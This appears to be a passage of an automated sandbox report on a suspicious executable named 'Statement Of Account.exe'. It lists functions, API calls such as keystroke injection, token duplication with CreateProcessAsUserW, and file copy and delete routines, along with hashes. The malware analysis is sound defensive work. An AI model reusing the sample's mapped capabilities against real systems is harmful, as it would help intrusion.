Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D

Function 004098B8 Relevance: 3.0, APIs: 2, Instructions: 32windowCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 004098F6
DispatchMessageW.USER32(?), ref: 00409901

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Message$DispatchTranslate
String ID:
API String ID: 1706434739-0
Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A

Function 004098B6 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 004098F6
DispatchMessageW.USER32(?), ref: 00409901

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Message$DispatchTranslate
String ID:
API String ID: 1706434739-0
Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A

Function 00410D40 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00410DEF

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5

Function 004092C0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
Opcode Fuzzy Hash: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E

Function 0041AA31 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08

Function 00444343 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3

WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6

Function 00414E06 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00414E13

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589

Function 0040D900 Relevance: 1.3, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54

Function 03E4DED4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 03E4DEE9

Memory Dump Source

Source File: 00000000.00000002.2061708935.0000000003E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e4b000_Statement Of Account.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: fb46dd36c02bf31b7df08b9b80494e012581fa7202acc7f0980949696ff047d1
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: E1E0BF7494420DEFDB10DFA8D9496DE7BB4EF04311F1006A1FD05E7681DB309E548A66

Function 03E4DED8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 03E4DEE9

Memory Dump Source

Source File: 00000000.00000002.2061708935.0000000003E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e4b000_Statement Of Account.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 18c01b1dd5ea37c4d0b2b13ac01700ce339e460e1fc8166d6642c44741ad6bb7
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 2CE0E67494420DDFDB00DFB8D94969E7BB4EF04301F1002A1FD01E2281D6309D508A62

Non-executed Functions

Function 0047C08E Relevance: 65.4, APIs: 35, Strings: 2, Instructions: 676windowkeyboardnativeCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
GetKeyState.USER32(00000011), ref: 0047C1A4
GetKeyState.USER32(00000009), ref: 0047C1AD
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
GetKeyState.USER32(00000010), ref: 0047C1CA
SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
SendMessageW.USER32 ref: 0047C2FB

Strings

@GUI_DRAGID, xrefs: 0047C45E
F, xrefs: 0047C7ED

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$State$DialogNtdllProc_
String ID: @GUI_DRAGID$F
API String ID: 2436949396-4164748364
Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A

Function 004375B0 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 126threadkeyboardwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
IsIconic.USER32(?), ref: 004375E1
ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
SetForegroundWindow.USER32(?), ref: 004375FD
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
GetCurrentThreadId.KERNEL32 ref: 00437619
GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
SetForegroundWindow.USER32(?), ref: 00437645
MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
keybd_event.USER32(00000012,00000000), ref: 0043765D
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
keybd_event.USER32(00000012,00000000), ref: 00437674
MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
keybd_event.USER32(00000012,00000000), ref: 0043768B
MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
keybd_event.USER32(00000012,00000000), ref: 004376A2
SetForegroundWindow.USER32(?), ref: 004376AD
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9

Strings

Shell_TrayWnd, xrefs: 004375D3

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 3778422247-2988720461
Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79

Function 004461ED Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 227processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044621B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
_wcslen.LIBCMT ref: 0044639E

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

_wcsncpy.LIBCMT ref: 004463C7
74AE5590.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4

Strings

default, xrefs: 004462DF
winsta0, xrefs: 0044629F
, xrefs: 00446227

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: StationWindow$CloseProcess$DesktopHandleOpen$CreateDuplicateE5590TokenUser_malloc_memset_wcslen_wcsncpy
String ID: $default$winsta0
API String ID: 1766766413-1027155976
Opcode ID: 46fbf0c91f7472a5aacc8247470ef491aaba77adfafaecf219e6b528db50d2b4
Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
Opcode Fuzzy Hash: 46fbf0c91f7472a5aacc8247470ef491aaba77adfafaecf219e6b528db50d2b4
Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B

Function 0044BD29 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Statement Of Account.exe,?,C:\Users\user\Desktop\Statement Of Account.exe,004A8E80,C:\Users\user\Desktop\Statement Of Account.exe,0040F3D2), ref: 0040FFCA

Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93

Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9

_wcscat.LIBCMT ref: 0044BD96
_wcscat.LIBCMT ref: 0044BDBF
__wsplitpath.LIBCMT ref: 0044BDEC
FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
_wcscpy.LIBCMT ref: 0044BE73
_wcscat.LIBCMT ref: 0044BE85
_wcscat.LIBCMT ref: 0044BE97
lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
DeleteFileW.KERNEL32(?), ref: 0044BED5
MoveFileW.KERNEL32(?,?), ref: 0044BEF5
CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
DeleteFileW.KERNEL32(?), ref: 0044BF17
CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
FindClose.KERNEL32(00000000), ref: 0044BF35
MoveFileW.KERNEL32(?,?), ref: 0044BF51
FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
FindClose.KERNEL32(00000000), ref: 0044BF7E

Strings

\*.*, xrefs: 0044BD90, 0044BDB9

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
String ID: \*.*
API String ID: 2188072990-1173974218
Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA

Function 00475FE5 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 213timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?), ref: 0047600C
FindClose.KERNEL32(00000000), ref: 0047604C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00476075
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0047608D
FileTimeToSystemTime.KERNEL32(?,?), ref: 004760B5
__swprintf.LIBCMT ref: 004760FF
__swprintf.LIBCMT ref: 0047614A
__swprintf.LIBCMT ref: 00476175

Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F

__swprintf.LIBCMT ref: 0047619C

Part of subcall function 0041353A: __flsbuf.LIBCMT ref: 004135AD
Part of subcall function 0041353A: __flsbuf.LIBCMT ref: 004135C5

__swprintf.LIBCMT ref: 004761C3
__swprintf.LIBCMT ref: 004761EA
__swprintf.LIBCMT ref: 00476211

Strings

HH, xrefs: 0047622C
%02d, xrefs: 0047616D, 00476196, 004761BB, 004761E2, 0047620B
